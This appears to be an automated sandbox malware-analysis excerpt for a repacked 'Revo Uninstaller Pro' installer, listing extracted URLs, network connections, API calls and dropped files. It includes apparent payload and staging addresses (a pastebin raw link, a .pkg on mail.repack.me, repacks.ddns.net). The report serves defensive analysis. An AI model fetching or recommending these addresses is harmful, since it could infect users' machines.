        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1630444927.000000000AA62000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000000.1403909400.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0H
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0I
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0W
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://repacks.ddns.nethttps://repack.me/ad.htmlopen
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://repacks.ddns.netopen
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://s.symcd.com06
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://s2.symcb.com0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/http/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/SV
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crl0a
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crt0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc1321
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4648S
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.Licence-Protector.com
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.animation.arthouse.org
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/rootpart.xml
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.color.org
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net10C763608-E632-4CB3-BE88-FD96CB346ADF6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.1CDKeyExtractor
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net1210AFEF9-4CF5-4E40-904C-344F600519D96.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.1CDKeyExtractor
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc3447.txtS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.itl.nist.gov/fipspubs/fip180-1.htm
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/%operationName%
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.movable-type.co.uk/scripts/xxtea.pdfS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.revouninstaller.com
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.revouninstaller.com/)
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.schneier.com/paper-blowfish-fse.htmlS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.schneier.com/paper-twofish-paper.pdfS
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vsrevogroup.com
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
        Source: setup.exe, 0000001D.00000003.2150919335.000000000180D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://features.opera-api2.com/api/v2/features?country=US&language=en-GB&uuid=ef78c5bf-264b-4601-87
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844157074.00000000009AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/Kj
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844375697.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809493894.00000000009C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkg
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkg2iq
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.repack.me/tsjtmfdm.pkgto
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809493894.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159897408.0000000000971000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809764960.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9B
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9BD
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bget8191
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159897408.0000000000971000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809764960.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/vkwZzU9Bm
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repack.me/ad.html
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/buy-update-subscription-btn/https://www.revouninstaller.com/buy-now-
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/contact-us/C:
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/downloads-manager/?filename=pro-%shttps://www.revouninstaller.com/up
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/feedback/?product=pro
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/feedback/?product=pro%d-%d-%dLast
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/Software
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/revo-uninstaller-pro-full-version-history/)
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/support/
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.com/updatepro5.xmlhttps://www.revouninstaller.com/downloads-manager/?fil
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.com
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstallerpro.com/db/ilogs/.ruelDelete
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.revouninstallerpro.com/db/ilogs/Uninstaller
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.9:49709 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 194.87.189.43:443 -> 192.168.2.9:49710 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 107.167.96.30:443 -> 192.168.2.9:49713 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 107.167.96.38:443 -> 192.168.2.9:49715 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 107.167.96.39:443 -> 192.168.2.9:49714 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 107.167.125.189:443 -> 192.168.2.9:49716 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 107.167.110.216:443 -> 192.168.2.9:49718 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 107.167.96.36:443 -> 192.168.2.9:49719 version: TLS 1.2
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_00405866 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002E6FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Code function: 27_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
        Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\system32\DRIVERS\SETE8C2.tmp
        Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\system32\DRIVERS\SETE8C2.tmp
        Source: C:\Windows\System32\rundll32.exe | File created: C:\Windows\system32\DRIVERS\SETE8C2.tmp
        Source: C:\Windows\System32\rundll32.exe | File deleted: C:\Windows\System32\drivers\SETE8C2.tmp
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Code function: 0_2_00406DC0
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002F626D
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002E83C0
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_0030C0B0
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002E30FC
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_00300113
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002FF3CA
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002F33D3
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_002EE510
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE | Code function: 16_2_0030C55E
